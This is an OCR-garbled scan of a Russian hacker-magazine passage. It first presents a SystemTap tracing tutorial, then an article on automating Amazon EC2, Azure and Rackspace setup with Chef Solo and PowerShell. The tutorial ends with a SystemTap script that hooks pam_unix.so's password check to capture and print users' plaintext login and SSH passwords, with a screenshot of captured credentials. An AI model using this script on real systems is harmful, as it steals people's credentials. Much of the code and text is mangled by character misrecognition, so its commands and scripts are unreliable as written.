гез'1:гіс‘1:есІ ипіѵегзе тиІ'Ьіѵегзе 

СІеЬ И-С-Ср://сІ(1еЬз.иЬип-Си.сот ргесізе-зесигіТу таіп ♦-і 
гез'ЬгісТесІ ипіѵегзе тиІ'Сіѵегзе 

СІеЬ Ь'Ь‘Ьр://сІсІеЬз.иЬипТи.сот ргесізе-ргорозесі таіп «-• 
гез-Ьгіс1:ес1 ипіѵегзе тиІТіѵегзе 

Затем обновить кеш ар1-де1: 

$ зисіо ар1-§еТ ирЬаТе 

И теперь можно устанавливать пакеты: 

$ зисіо арТ-ееІ: іпзіаіі зузІіетТар Ьиіісі-еззепіііаі ♦-< 
е1-Ри1:і1з Ііпих-ЬеасІегз-депегіс 
1іпих-іта§е-$(ипате -г)-сІЬ§зут 

Для того чтобы БузІетТар получил доступ к датчикам, необ- 
ходимо выполнить следующий скрипт из-под рута (впрочем, его 
необходимо выполнять всякий раз, когда устанавливаешь допол- 
нительные отладочные символы): 

ирсІа-Ье-тосІиІе-ргоЬез 

#!/Ьіп/ЬазЬ 

•Рог біе іп 'бпЬ /изг/ІіЬ/ЬеЬиё -пате '♦.ко' -ргіп-Ь' 

до 

Ьиі1сІісІ= ' еи-геасіеі-р -п $б1е( §гер ВиіІсІ.ІО: ) «-• 

амк '{ргіпТ $3}'' 

сІіг='есЬо $Ьиі1сІісІ | си-С -с1-2' 

■Рп='есЬо $Ьиі1сІісІ | сиТ -сЗ-' 

ткЬіг -р /изг/1іЬ/сІеЬи§/.Ьиі1гі-і(1/$сІіг 

Іп -3 $б1е /изг/1іЬ/сІеЬи§/.Ьиі1сІ-ісІ/$сІіг/$-Рп 

Іп -3 $б1е /изг/1іЬ/сІеЬи8/.Ьиі1с1-ісІ/$с1іг/${-Рп}.*-< 

ЬеЬиё 

Ьопе 

Все! БузІетТар готов к использованию. 







Вся информация 
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целях. Ни редакция, 
ИИ автор не несут 

ответственности 
за любой возможный 
вред, причиненный 
материалами данной 

статьи. 



Ьі«._Іу/сУ9НѴк — 

подборка скриптов 

ДляЗузіетТар. 



гоо»@АЬАИ:/Иоте/гот/5у5»етгар 



файл Правка Вид Пеиск Терминал Справка 
,[гоог(аА1АН 5у5гетгар)# Яар ./разз рат саргиге.зір 

Шзег: )ое 
|Ра55ѵ/ог(1: 123 



РгоЬаЫу а пеіѵ/огк (55Н) Іодіп. 
и$ег: ]ое 
Ра55ѵ/ог(1: 123 



Перехват паролей с использованием ЗувІетТар 






АРХИТЕКТУРА И ОСОБЕННОСТИ 5У5ТЕМТАР 



Архитектура БузІетТар отличается от архитектуры ОТгасе, хоть 
и не сильно, но ощутимо (это же, но в меньшей степени отно- 
сится и к скриптовому языку), поэтому рассмотрю ее подробнее. 

В основном отличия касаются того, как именно обрабатывается 
скрипт, — давай взглянем на операции, выполняемые при его 
запуске. 

• Первый проход (как и три последующих) делается командой зіар. 
Заключается он в том, что скрипт парсится на предмет всяческих 
ошибок и неточностей. 

• Второй проход — формирование (еІаЬогаІіоп) — состоит в разре- 
шении различных ссылок нате функции, которые в этом скрипте 
отслеживаются, и линковки стапсетами/кодом на С (о том, что та- 
кое тапсет, будет чуть ниже). Практически этотпроходаналогичен 
линковке обычных пользовательских программ. 

• Третий же проход — трансляция скрипта — во что бы ты думал? — 
в код на С. В отличие от ОТгасе, в котором скрипт компилируется 

в ограниченный р-код, который уже исполняется на уровне ядра 
в виртуальной машине, здесь возможности гораздо шире. 

• Четвертый проход — компиляция. Причем компиляция не какой- 
то там пользовательской программы, а модуля ядра. 

• Ну и пятый проход— собственно использование. Выходной файл 
модуля загружается с помощью зіаргип в ядро, вывод его, если 
таковой имеется, перенаправляется зіаріо в зісіоиі, а кактолько 
модульзавершитсвоюработу,5Іаргип же его и выгружает. 

На низком уровне Буз^еглТар использует подсистему 1<ргоЬез, кото- 
рая появилась в далеком 2002 году в ядре 2.5.25. 

А как же безопасность? Ну, во-первых, по умолчанию БузІетТар 
доступен только суперпользователю, который и так может по- 
рушить систему, когда ему это захочется. Во-вторых... синтаксис 
языка запрещает использовать привилегированные инструкции 
процессора (еще бы — ведь инлайн-ассемблера там нет). Плюс во 
время формирования/трансляции производятся проверки на бес- 
конечные циклы, рекурсию, деление на ноль... Ах да — имеется 
даже фишка подписывания готовых модулей! Таким образом, с уче- 
том последнего, БузІетТар может быть разрешен даже непривиле- 
гированным пользователям (но я бы этой возможностью советовал 
пользоваться с осторожностью). 

Вместе с тем, если тебе необходима большая гибкость, чем 
предоставляет его скриптовый язык, имеется возможность ис- 
пользовать диги тобе, который позволяет в том числе использо- 
вать етЬеббеб С. 

БузІетТар позволяет производить трассировку не только 
в ядре, но и в процессе — поддерживаются как заданные разра- 
ботчиками маркеры (примерная аналогия провайдеров в ОТгасе), 
так и пользовательские точки трассировки на любой доступной 
функции. Но для этого необходимо иметь поддержку иігасе в ядре. 




а в ІІЬипІи она по дефолту отсутствует, поэтому использование этой 
функции будет описано на основе БсіепІіЛс Ііпих 6. 

Также имеются тапсеты. Что это такое? Тапсеты — наборы обо- 
лочек вокруг тех или иных датчиков (впрочем, вложенные тапсеты 
тоже применяются). Допустим, датчик зузсаІІ.геаб на самом деле 
является оберткой для датчика кегпеІ.^ипсІіоп("зуз_геаб").саІІ. 



ПРИМЕНЕНИЕ 



Но давай посмотрим на синтаксис скриптов. Общий синтаксис 
таков: 

еІоЬаІ переменные 
ргоЬе событие 
{ 

Действия 

/* 

Многострочный 

комментарий 

♦/ 

// Однострочный комментарий 
# Тоже однострочный комментарий 

} 

Отличается от синтаксиса ОТгасе, но не настолько, чтобы что-то 
было непонятно. Тем не менее разберем его по косточкам. 

• Перваястрочкаобъявляетглобальныепеременные, конечно, 
если они используются. 

• Вторая строчка аналогична указанию провайдера в ОТгасе. 

• Действия — что делать при срабатывании датчика? 

«Стоп. А где же условие, по которому можно фильтровать?» — 
спросишь ты. В этом скриптовом языке есть то, чего нет в ОТгасе, — 
условные выражения и циклы (с соответствующими операторами 
выхода). Условное выражение там одно — і^еIзе, синтаксис 
С-подобный, а вот циклов аж три штуки: !ог, ѵѵЫІе (оба опять же 
С-подобные) и ^огеасЬ (синтаксис аѵѵк). 

Но это что касается условий. А выражения? В общем, они опять 
же С-подобные, плюс еще несколько специфичных для БузІетТар. 

К последним относятся такие выражения, как сбор статистики 
(оператор «<), конкатенация строк (перловый синтаксис)... 

Доступны следующие типы переменных: строки, іпіедегз, 
ассоциативные массивы и статистика (аналогично агрегированным 
переменным в ОТгасе). Переменные, которые начинаются со знака 
$, являются переменными трассируемой функции. 

Комментарии доступны двух видов: С++-подобные (как много- 
строчные, так и однострочные) и типичные для скриптов оболочки. 

Посмотрим, как будет выглядеть простенький скрипт 
на БузІетТар: 










файл Правка 


ВиА Терминал 


Переход Справка 


Терминал - гот^гот-бмИер. -/вупвтЬр 


гоаЯгвш-ЛаівкКор; -/$ух(м{ар< $и6о хіар ./іухсаіі вгг соипг, 


«Р 


лс РІО 


5ухса1і 


Ргосехх Маме 


Еггог 


Со«іт 


199« 


*ух_г*сѵ?го« 


хЬш4 


ЕАСА1М 


649 


1996 


»ух_гвсѵ 


ХІ«ММ 


ЕАСАШ 


649 


1637 


іух_гвай 


Хоге 


ЕА6АІН 


497 


2175 


*у*_г*сѵ^го* 


(ИипаегЫгб 


ЕАСАШ 


470 


2175 


»у*_гвсѵ 


(КипОегЬігсІ 


ЕАОАІМ 


470 


1989 


»у»_гвсѵ^г«к 


ххсгеепхаѵег 


ЕАСАІН 


342 


1989 


»у»_гвсѵ 


ххсгсспхаѵег 


ЕАСА1Ч 


342 


2175 


$уі_гса<1 


(ЬипбегЬігд 


ЕАСАІЧ 


336 


2336 


»уі_г#сѵУго* 


х^се4-гегяіааІ 


ЕАСАІМ 


315 


2336 


»у*_гвсѵ 


х^се4-(егяіпа1 


ЕАСАІМ 


315 


2336 


хус_гва<і 


х^с#4-гег«іпа1 


ЕА6АІМ 


231 


2904 


ху5_г*а<1 


хгаріо 


ЕАСАІМ 


142 


1996 




х^мвИ 


ЕАСА1Ч 


129 


1998 


»у*_г*<ѵ^гв« 


хТсе4>рапе1 


ЕА6А1Н 


129 


1998 


»у»_г*сѵ 


хІсе4-рапе1 


ЕАОАІМ 


129 


2175 


хух.Тиівх 


тЫннІегЫгб 


Етіікооит 


125 


2084 


хух_гвсѵ^гоа 


х^се4-хкЬ>р1иеі 


ЕАСАІМ 


122 


2084 


хух_гвсѵ 


хІсс4>хкЬ>р1иеі 


ЕАОАІМ 


122 


1021 


хух_?иівх 


■ухоііі 


ЕТІИЕООЦТ 


75 


1007 


хух_ор«п 


ігрЬвІапсе 


ЕМОЕМТ 


44 


Оѵвгвіі ху&саіі вггогх соипс 6214 






ИМШІИ6 МіиЬвг оГ вггогх: 


0, хкірресі ргоЬех: 


63 




гоа9гв»><1ехкіор;-/хуігміарЗ | 







Подсчет ошибок системных вызовов 



5Ітр1е.$'Ьр 

#!/и5г/Ьіп/5-Ьар 

бІоЬаІ 5у5са11_соип1 = 0 
ргоЬе 5у5са11.* 

{ 

і-Р (ехеспатеО == "тс") 

{ 

5у5са11_соигтЬ++; 

} 

} 

ргоЬе епсі 

{ 

ргіп1:-Р("\п$у5са11 соип-^ о-Р тс: %сІ\п", 5у5са11_соип1); 

} 

Скрипт получился длиннее, но в целом, думаю, не сложнее. 

СНОВА О ПЕРЕХВАТЕ ПАРОЛЕЙ 

Скрипт перехвата паролей на ОТгасе, который был описан выше, 
довольно примитивный и выдает кучу бесполезной информации. 
Поэтому я решил написать скрипт, который достает логин/пароль 
из РАМ'а и выводит их на экран. Поскольку в Убунте, как уже 
говорилось, иігасе по дефолту отключен, тестировал я его 
на $сіепІіЛс Ыпих 6 (клон РНЕІ), и некоторые команды, приведен- 
ные ниже, отличаются от таковых в ОеЬіап-Ьавесі дистрах. Далее 
предполагается, что у тебя уже установлен БузІетТар и компиля- 
тор. 

Обновимся до последней версии (на момент написания статьи 
это была версия 6.3) и установим отладочные символы РАМ: 

# уит сіеап а11 

# уит --ге1еа5еѵег=6.3 ирсІа-Ье 

# сІеЬи§іп-Ро-іп5І:а11 'грт -ц-Р /1іЬ/5есигі‘Ьу/рат_ипіх.5о' 

А вот и скрипт: 

ра55_рат_сар-Ьиге.5Ір 

#!/и5г/Ьіп/5-Ьар 

еІоЬаІ изегпате, разз, ізБиссКеІ = 1; 

# Перехватываем проверку пароля 

ргоЬе ргосе55("/1іЬ/зесигі'Ьу/рат_ипіх.5о").*-' 

•Рипсіііоп ( "_ипіх_ѵегі-Ру_раз5ыогсІ " ) 

{ 




Тапсет 5у5са11$2.5(р. Виден алиас для 5у$_геас1() 

# Сохраняем имя и пароль 
изегпате = изег_з‘1:гіп§($пате); 
разз = изег_з1гіп§($р); 

} 

ргоЬе ргосезз( "/1іЬ/зесигі-Су/рат_ипіх . зо" ) 

•Рипс-кіоп( "_ипіх_ѵегі-Ру_раззмогЬ" ) . ге-Ьигп 

{ 

# Проверяем^ был ли вызов функции успешным 
і-Р ($геіигп == 0) 

{ 

# Если да, то печатаем сохраненные значения 
ргіп-^-р("1)зег: %з\пРаззмогс1: %з\п\п", 4-^ 
изегпате, разз); 
ізБиссКеі = 0; 

} 

} 

ргоЬе ргосезз("/1іЬ/зесигі1у/рат_ипіх.зо") .4-« 

■Рипсііоп( "рат_зт_ореп_зеззіоп" ) 

{ 

і-Р (ізЗиссКеІ: != 0) 

{ 

ргіп-1:-Р("РгоЬаЫу а пе-Ьмогк (55Н) І 08 Іп.\п\ 

ІІзег: %з\пРаззмогсІ: %з\п\п", изегпате, разз); 

} 

ізБиссКеі: = 1; 

} 

У меня по каким-то мистическим причинам датчик на выход 
из функции _ипіх_ѵегі(у_раззѵѵогсі() при логине по 55Н не реагиро 
вал. Пришлось применить неизящный хак: при заходе в функцию 
рат_зт_ореп_зеззіоп(), которая вызывается в основном после 
успешной попытки логина, проверяется переменная, которая 
устанавливается в ноль на выходе из вышеозначенной функции. 
Если она ему не равна, то скрипт говорит, что, возможно, это по- 
пытка входа по 55Н, и опять же печатает перехваченные данные, 
устанавливая после этого значение переменной в единицу, чтобы 
при следующем логине по 55Н снова их напечатать. 



ЗАКЛЮЧЕНИЕ 



Подведем итоги. Как ОТгасе, так и БузІетТар — мощнейшие 
инструменты для исследования системы. С их помощью можно 
сделать много полезных вещей в относительно короткие сроки. Ре- 
ализация ОТгасе под Ыпих очень сырая, что огорчает, но БузІетТар 
может с успехом заменить ОТгасе, а в некоторых случаях позволяет 
производить гораздо более тонкие манипуляции, чем это возможно 
с использованием ОТгасе. ЗС 






5УН/АСК 



Сергей Яренчук (дгіпсіегідзупаск.ги) 




АВТОКОНФИГУРИРОВАНИЕ 
ПОПУЛЯРНЫХ ОБЛАЧНЫХ 
СЕРВИСОВ 



При большом количестве новых систем и сер- 
висов в облаке ручное конфигурирование 
доставит админу множество хлопот. Исполь- 
зуя АРІ-функции и утилиты командной строки, 
можно автоматизировать большую часть ру- 
тинных операций и превратить сеть облачных 
ресурсов в интеллектуальную самонастраива- 
емую ІТ-инфраструктуру. 



РАЗВОРАЧИВАЕМ СЕРВЕР В АМА20М ЕС2 



Атагоп предоставляет каждому зарегистрированному пользователю 
полноценный бесплатный ѴР5 на год (Місго іпзіапсез — 11 .тісго): 

613 Мб оперативной памяти, 10 Гб дискового пространства, 15 Гб 
трафика, 750 часов машинного времени (подробности на аѵ/з.атагоп, 
сотЛгее ). Это очень щедрое предложение, учитывая, что мы полу- 
чаем место для нескольких не сильно нагруженных веб-сайтов или 
свой ѴРМ с зарубежным ІР. По прошествии тестового периода можно 
купить полноценный аккаунт, перенести сервисы в другое место 
или спокойно все удалить. Сервис Атагоп ЕС2 очень удобен, когда 
требуется использовать несколько однотипных (или почти) систем. 
Так, развертывание и настройка выполняются при помощи интуи- 
тивно понятного веб-интерфейса, а специализированные решения 
АѴѴ5 Мападеппепі Сопзоіе и Еіазііс Веапзіаік позволяют установить 
преконфигурированное окружение одним кликом. Правда, ручная 
доводка все равно потребует значительного количества времени, 
но, применив средства автоматизации, эту проблему можно легко 
решить. Вариантов здесь несколько, мы остановимся лишь на одном 
из них — как мне кажется, самом простом и удобном. 

Для доступа к функциям облачного сервиса нам понадобит- 
ся набор инструментов Атагоп ЕС2 АРІ Тооіз ( аѵуз.аппагоп.сот/ 
с1еѵеІорегІооІ5/3511 . а в качестве средства автоматизации будем 
использовать СЬеІ 5о1о ( орзсосІе.сопп/сЬеІ І. 



Подробно работу с Атаіоп ЕС2 рассматривать не будем, про- 
цесс регистрации на сервере и создания аккаунта несложен, нужна 
лишь кредитная карта (будет снята сумма в размере одного доллара, 
которую сразу вернут) и телефон для активации кода. Сначала необ- 
ходимо скачать и установить Атагоп ЕС2 АРІ Тооіз (написан на Эаѵа, 
для удобства каталог должен быть виден переменной раіЬ), а затем 
скопировать ключи. Вот и все. 

Пару слов о СЬеГ Это простой и понятный инструмент, не требующий 
особой подготовки и имеющий множество готовых рецептов. Проект 
СНеІ возник как внутренняя разработка компании Орзсосіе, при его 
создании основной целью было обеспечить построение полностью 
автоматизированной инфраструктуры, где все компоненты могли бы 
общаться друг с другом и в будущем максимально исключить вмеша- 
тельство админиаратора. По своему принципу СЬе! относится к де- 
кларативным системам, аналогичным Сіепдіпе и Рирреі. Фундаментом 
СЬеІ являются рецепты соокЬоокз, которые содержат все необходимые 
установки для автоматизации развертывания приложений. Для каждого 
приложения создается отдельный соокЬоок, в котором хранятся файлы, 
необходимые для инсталляции/настройки приложения, темплейты — 
параметризованные конфиги, которые подараиваются под ОС, а также 
сценарии установки. Плюсом СЬеІ является использование в правилах 
языка РиЬу, хотя можно включать и другие языки — РуіЬоп, РегІ, Егіапд 
и зЬеІІ. За время своего развития проект оброс готовыми соокЬоокз, 
под все типовые задачи. Сборник рецептов от комьюнити можно найти 
в оіІ пиЬ.сот/орзсоЬе-соокЬоокз . 

Как и другие подобные решения, СЬеІ построен по клиент-сер- 
верной схеме, но в нашем случае мы воспользуемся возможностью 
работы без сервера, в автономном узле (сЬеІ-зоІо). Создав один раз 
настройку для сЬеІ-зоІо, мы можем быстро ее применить на любом 
количестве компьютеров, избегая ненужной монотонной работы 
и не прибегая к развертыванию всей структуры СЬеС 

Для работы СЬеІ 5о1о используются два конфигурационных фай- 
ла — зоІо.гЬ и поЬе.]зо. В зоІо.гЬ указываются рабочие каталоги: 

$ папо зоІо.гЬ 

Я1е_сасЬе_ра'1:Ь "/ѵаг/сЬе-Р-зоІо" 
соокЬоок_ра‘1:Ь "/ѵаг/сЬе-Р-зоІо/соокЬоокз" 
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сІа-1:а_Ьа§_ра-1:Іі ’7ѵаг/сЬе-Р-5о1о/с1а1:а_Ьа§5'' 
го1е_раТІі "/ѵаг/сИе-Р-зоІо/гоІез" 

1об_1осаТіоп "/ѵаг/1о§/сИе-Р/50Іо. 1о§" 
ѵегЬо5е_1оееіп8 ^гие 

Файл по(1е.]50п содержит конфигурацию узла и список задейство- 
ванных рецептов (параметр гесіре). Название рецепта узнать просто, 
достаточно просмотреть список папок в біі. Например, для разверты- 
вания классического ІАМР-сервера создаем такой файл: 

$ папо посIе.^5оп 
пос1ео'5оп: 

{ 

"гип_1і5'Ь": [ 

"гесіре[рІір: :раска§е]'7 
" гесіре [рИр: :тосІи1е_ту5ЯІ]", 

” гесіре [арасИе2]", 

"гесіре[арасИе2: :тос1_рбр5]", 

"гесіре[ту5ц1: ізегѵег]", 

]. 

"рЬр" : { "соп-Р_сІіг" : "/еіс/" }, 

"тузді" : { "5егѵег_гооі;_ра55могсІ" : "р@55м0гО", 
"5егѵісе_пате" : "тузцісі", 

"рІаі-Рогт" : "атагоп" } 

} 



Теперь можно зайти по 55Н, установить СЬеС скопировать создан- 
ные файлы и затем выполнить команду: 

$ сЬе-Р-50І0 -с 50І0.гЬ -^ посіе.з’зоп -ІсІеЬиб 

Но мы воспользуемся возможностью передачи пользовательских 
параметров в утилитах Атагоп. Для зтого давай подготовим ЬазЬ- 
скрипт, который будем использовать для развертывания ІІЬипІи 12.04 
1Т5: 

$ папо сИе-Р-5о1о.5Ь 
#!/Ьіп/Ьа5И -X 

# Журнал 

ЮС5="/1:пір/сІіе-Р-50Іо.$(сІа-1:е -I)" 
ехес > $1СХ55 2>&1 

ехрогі ^ЕВIАN_РКОNТЕN^=попіпіегасііѵе 

# Ставим Сбе-Р 

есИо "сІеЬ Ьіір://ар1:.ор5сосІе.сот/ ргесі5е-0.10 таіп" ( 
зисіо Тее /еТс/арТ/зоигсез.ІізТ.сІ/орзсосІе.ІізІ: 
арТ-^еТ ирсІаТе 

арТ-§еТ -у ---Рогсе-уез іпзТаІІ орзсосІе-кеугіп§ сЬе-Р ^іт 



• Атагоп АРІТооІ$ 
Яе^егепсе: 
доо. д|/0аіп4; 

• сайтСЬе^ 
р р$ со (Іе ,со т/сЬе (; 
•СНе! СоокЬоокз: 
диЬиЬ.сот/ 
ор$со(іе-соокЬоок5; 

• инструменты 
\А^іп(іоѵ)/ 5 Агиге: 
ѵуіп(іоѵѵ5а2иге. 
срт/еп-и?/ 
тападе/сІоѵѵпІоа(І5; 

• список образов 
дистрибутивов 
ІІЬипІи для 
облачных 
сервисов; сіоигі- 
ітаде5.иЬип<и. 
сот . 



ІШІ 

• После импорта 
риЫі$Ь$еиіпд$- 
файл, полученный 

С\А/ІП(І 0 М 5 

Агиге, следует 

обязательно 

удалить. 

• Программы Ата- 
гоп ЕС2 !ооі 5 могут 
работать с Атагоп 
только с белого 
адреса. 



АВТОМАТИЗАЦИЯ 
В РАМКАХ ХЕМ 
СЕООО РЕАТРОРМ 



Разработчики Сіігіх 
для управления облачным 
сервисом предлагают три 
способа: платный ХепСеШег 
с графическим интерфей- 
сом (под ѴѴіпсІоѵѵз), утилита 
командной строки Хеп СИ 
(хе) и Хеп5егѵег ХАРІ ( аоо. 
д1/к0с1гр 1. Собственно, два первых являются над- 
стройкой над ХАРІ, который позволяет конфигури- 
ровать, распределять ресурсы и контролировать 
работу отдельных хостов и групп. С его помощью 
сторонние производители получают возмож- 
ность создавать собственные модули управления. 
Вот только некоторые из них: ОрепХепСепІег 
( орепхепсеІег.зЕпеІ І. ОрепХепМападег 
( орепхептападег.зЕпеІ І. ОрепМеЬиІа ( ореппеЬиІа. 
огд і. 2еп1ібс ( гепбПс.сот І. Еисаіуріиз. Кроме 
того, не стоит забывать о библиотеке управле- 
ния виртуализацией ІіЬѵігі ( ІіЬѵігЕогд І. которая 
обеспечивает простой доступ ко всем основным 
настройкам ѴМ Хеп. 




# Скачиваем соокЬоокз 
тксііг /ѵаг/сПе-Р-зоІо 
ссі /ѵаг/сЬе-Р-50Іо 

§ІТ сіопе ІѵСТр5://8і'иіиЬ.сот/ор5СОсіе/соокЬоок5 

# Запускаем сПе-Р-зоІо 

сИе-Р-зоІо -с Ы:'1:р://ммѵ/.ехатр1е.сот/50Іо.гЬ -3 ♦-« 

ИТір : //шѵі . ехатріе . сот/посіе . 3 зоп 

При необходимости пример можно дополнить другими параметра- 
ми, которые устанавливаются средствами ЬазЬ, СЬе^ или Аглаіоп АРІ: 
настроить имя узла, сеть, инсталлировать дополнительные пакеты 
и прочее. 

В данном случае мы скачали все соокЬоокз. Это универсальное 
решение, но обычно в этом нет смысла. Чтобы ускорить процесс, нуж- 
ные рецепты можно собрать в своем біі-репозитории или запаковать 
в архив, который подключать при вызове сI^е^50І0 с помощью ключа 
' -г ѵѵѵѵѵѵ.еxатрIе.сот/сЬе^соокЬоок5.^аг.д2 ' . Но следует помнить, 
что некоторые соокЬоокз зависимы от других, их тоже придется поло- 
жить в архив. Узнать сопутствующие рецепты легко, для этого нужно 
просмотреть параметры іпсІис1е_гесіре в файлах гесірезЛ.гЬ. 

$ §гер -к Іпс1ис1е_гесіре соокЬоокз/*/гесіре/* . гЬ 

Выбираем любой доступный на Аппагоп образ (ес2-сІе5СГІЬе- 
ітадез -а) или один из предлагаемых сервисами вроде сіоисі-ітадез. 
иЬипІи.сопп. Создаем инстанс, указав в качестве изег-сіаіа-біе соз- 
данный ЬазИ-скрипт: 

$ ес2-гип-іпзіапсез аті-ссІааЗссІ -Е ІІ.тісго -к 
{5есКеу_Атагоп} --изег-сІаТа-бІе сЬе-Р-зоІо. зб 

Вскоре команда ес2-сіе5СгіЬе-іп5Іапсе5 покажет новый инстанс, 
можно подключиться к нему и продолжать работу. Этот трюк работает 
и при развертывании ѴѴіпсіоѵѵз в Атагоп, только используй стсі/ѵЬз/. 
МЕТ-инструментарий, хотя для виндовых дел более удобен Агиге. 
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УПРАВЛЯЕМ ѴѴІЫ00ѴѴ5 А2УРЕ 
ПРИ ПОМОЩИ Р0ѴѴЕР5НЕІЦ 



Сервис ^іп(іоѵѵ5 Агиге в особом представлении не нуждается, 
разработчики также предлагают 90-дневный тестовый период 
( ѵѵ г/ . і п сі о V/ 5 а і; г о . с о т /•:■ п - 1: 5 / р п с I п д / г г с о - 1 г I а і ), п а р а м етр ы 

В общем и целом напоминают Аппагоп. Правда, снятый доллар 
они не возвращают :). Для управления сервисами, кроме веб- 
панели ^іпбоѵѵз Агиге Мападетепі Рогіаі, предложен целый 
комплект инструментов под разные ОС ( ѵѵ ѵ^ , і п сі о 5 а 2 и г е . с с т / 
еп-и5 /тапаао/а оѵѵпІоасІ5 І. Для ѴѴіпс1о\л/5 это набор командлетов 
РоѵѵегЗЬеІІ, для Мае 05 и Сіпих — утилита командной строки 
агиге. Имеются и альтернативные командлеты от проекта СобеРІех 
(ѵѵа рроѵѵег5б о І.сосіооіе х.сот ), правда, проект закрывается 
в пользу официальных инструментов, но какое-то время они будут 
доступны, так как в последних отсутствуют некоторые командлеты 
диагностики, управления трафиком и 501. 

Всего предоставляется более 80 командлетов, позволяю- 
щих быстро развернуть новые, обновить, удалить ѴМ/сервисы, 
управлять подпиской, учетными записями хранилища и сертифи- 
катами, производить диагностику. Самый простой способ устано- 
вить командлеты — это перейти на указанную ссылку и нажать 
ІпзІаІІ, а затем запустить полученный ехе'шник, который загрузит 
и поставит все необходимое. После этого появится отдельный 
ярлык, открывающий консоль для запуска командлетов Агиге 
(функция доступна с версии 2.2.2+, ярлык можно создать само- 
му, команда для запуска следующая: «С:\ѴѴіпсІоѵѵ5\5у5ѴѴ0ѴѴ64\ 
^іпбоѵѵ5Роѵѵег5ЬеІІ\ѵ1.0\роѵѵег5ЬеІІ.ехе -МоЕхіІ -СотглапсІ "ссі 
'С:\'; беІ-СЫІсШет ’С:\Ргодгат РіІе$ (х86)\Місго5ои 50К$\ 
ѴѴіпсіоѵѵз Агиге\Роѵѵег5ЬеІІ\Агиге\*.р5(Л ’ I РогЕасЬ-0Ь]ес1 {Ітрогі- 
Мобиіе $_}"»). Чтобы иметь возможность выполнять эти командле- 
ты в обычной консоли, следует импортировать модуль. Выполняем 
с правами администратора: 

Р5> 5е-Ь-Ехеси1:іопРо1ісу Кето1:е5і§песІ 

Р5> ІтрогТ-МосІиІе "С:\Рго8гаш Рііез (х86)\Місго50-Рі: 50К5\*-< 
МІПСІОМ5 Агиге\Ромег5Ііе11\А2иге\А2иге . рзсіі" 

Смотрим список доступных командлетов: 

Р5> Се'^-СоттапсІ -Мосіиіе А 2 иге 

Для начала работы следует настроить связь между клиентским 
ПК и Агиге. Для этого после регистрации переходим по адресу 

ѵ .'іп (іс\ѵ5.а: он )/сіО'Л''ПІог^сі/ риЬі:ь іі сго(і;е.а5 рл. сохраняем серти- 
фикат (файл с расширением риЫізЬзеиіпдз) и импортируем: 

Р5> Ітрог-С-АгигеРиЫізЬБе-Ь-СіпезРіІе 
' с : \шу_риЬ . риЫізЬзеІ-Сіпбз ' 



ХОСТИНГ-ПРОВАЙДЕР РАСК5РАСЕ 



Р8 С:чи8вг5\дгіпіІег> Сеі-Йгиге8иЬгсі*ірі іоп 
8иЬгсі*ір(:іопМАпе : З-ПопСЬ Ргее Ті*іа1 

8иЬ$сі*ірСіопІЛ : 96сГдА54-15в9-462Г-9ГсТ-Г 161в<184966с 

СегііГісАіе : [$иЬоес( 1 

СИИЛпаоиг Йгіігв Тооіз 

1 1 сгиег 1 

СН<*иіпіІоиз Йгиі^ Тооіх 
(8егІАІ НияЬегІ 

1СЕВ6в7472В167ЙЙ4-16Й778М5ЙС9861 

(Моі ВеГогв] 

84.12.2012 19:38:15 

ІМоі ЙГСегІ 

84.12.2813 19:38:15 

{ТЬипЬрі'іпе ) 

91918Р62Й963С2893Е639ЙР244256602Е36Е6ѴВ9 

8егѵісеЕл(1роіпі : Ьсірк ://’««АПАдеяепі .соі*« .ыіпсіоиг .пе(/ 

8д1Й2иге8егѵісеЕп<1роіп( : 

Сигі*епС$(огАдейссоип(. : 

ІкВеГАии : Тічіе 



Проверяем информацию о подписке 

Профиль публикации сохраняется в С:\и5ег5\изег\Арр0аІа\ 
Роатіпд\\Л/іп(іо\л/5 Агиге Ро\л/егзЬеІІ, после импорта файл обязатель- 
но удаляем. Чтобы просмотреть статус подписки, достаточно ввести 
беІ-АгигеВиЬзсгірГюп. Если подписок несколько, для установки 
нужного профиля в текущей сессии используй командлет 5еІ- 
Агиге5иЬзсгірІіоп. 

После установки список ѴМ, сервисов, сетевых и устройств хранения, 
естественно, пуст, их создает сам пользователь. Смотрим список ІДОД: 

Р5> СеТ-АгигеІосаТіоп 

Выбираем понравившийся и создаем устройство хранения, указав 
ЦОД в параметре Іосаііоп: 

Р5> Мем-АгигеБ’СогазеАссоип'С -5■^:ога8еАссоипТ:Nате «-« 
’тузТогабе' -ІосаТіоп 'ЕазТ 115* 

Для проверки установки выполни 6еІ-Агиге5іогадеАссоипІ. 

В дальнейшем при настройке подписки с помощью 5еІ- 
Агиге5иЬзсгірІіоп через параметр -Сиггепі5іогадеАссоипІ можно 
сразу указывать созданное устройство хранения. 

Чтобы создать новую виртуальную машину, командлету Меѵѵ- 
АгигеОиіскѴМ следует передать тип ОС (ѴѴіпсІоѵѵз/ипих), имя сервиса/ 
ѴМ/образа и пароль админа: 

Р5> Nем-А 2 иге^иіскVМ -Иіпсіомз -5ерѵісеNате МіпБгѵ 4-і 
-Nате ТезІіѴМ -ІтаееМате М5РТ__Міп2К8К25Р1-Оа1:асеп1:ег^ 

- 201210. 01 -еп. из- ЗѲСВ.ѵИсІ -РаззмогсІ асІтіпР@55 



Один из самых популярных хостинг-провай- 
деров, Раскзрасе ( гаскзоасе.сот і предлагает 
услуги облачного хранения файлов, размеще- 
ния сайтов, серверов, базы данных и обладает 
возможностями балансировки нагрузки, мони- 
торинга и еще много чего. Среди клиентов ком- 
пании чуть ли не половина участников Рогіипе 
100. Для управления системами и сервисами 
предлагается несколько РЕ5Т1и1 АРІ, поддер- 
живающих основные функции и позволяющих 
автоматизировать операции. В основе 1аа5 
лежит Ореп54аск, и доступен соответствующий 
АРІ, который также можно использовать для 



автоматизации типовых задач — добавления, 
удаления, перезагрузки, включения, измене- 
ния размеров серверов и некоторых других. Все 
возможности хорошо документированы ( сіосз. 
гаскзрасе.согл/арі ). в частности, там можно 
найти готовые примеры, хотя на их изучение 
потребуется время. Кроме того, в (діііщЬ. 
согп/гаскзрасе і находится несколько дополни- 
тельных инструментов на самых разных языках 
программирования, инструменты эти помогут 
упростить работу админа. Ключ для доступа к 
АРІ можно найти в веб-интерфейсе управления 
Раскзрасе СІоисі Сопігоі РапеІ. 
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При помощи командлета ТезІ-АгигеМате можно заранее прове- 
рить корректность имени, выбранного для «-БегѵісеМате», если все 
нормально, в ответ должны получить Ігие. Название нужного образа 
для ІтадеМате получить очень просто: 

Р5> бе‘С-А 2 игеѴМІта§е 1 зеІесС Iта8еNате 

Виртуальная машина Ііпих создается аналогичной командой, 
только используем «-Ыпих» и указываем соответствующий образ 
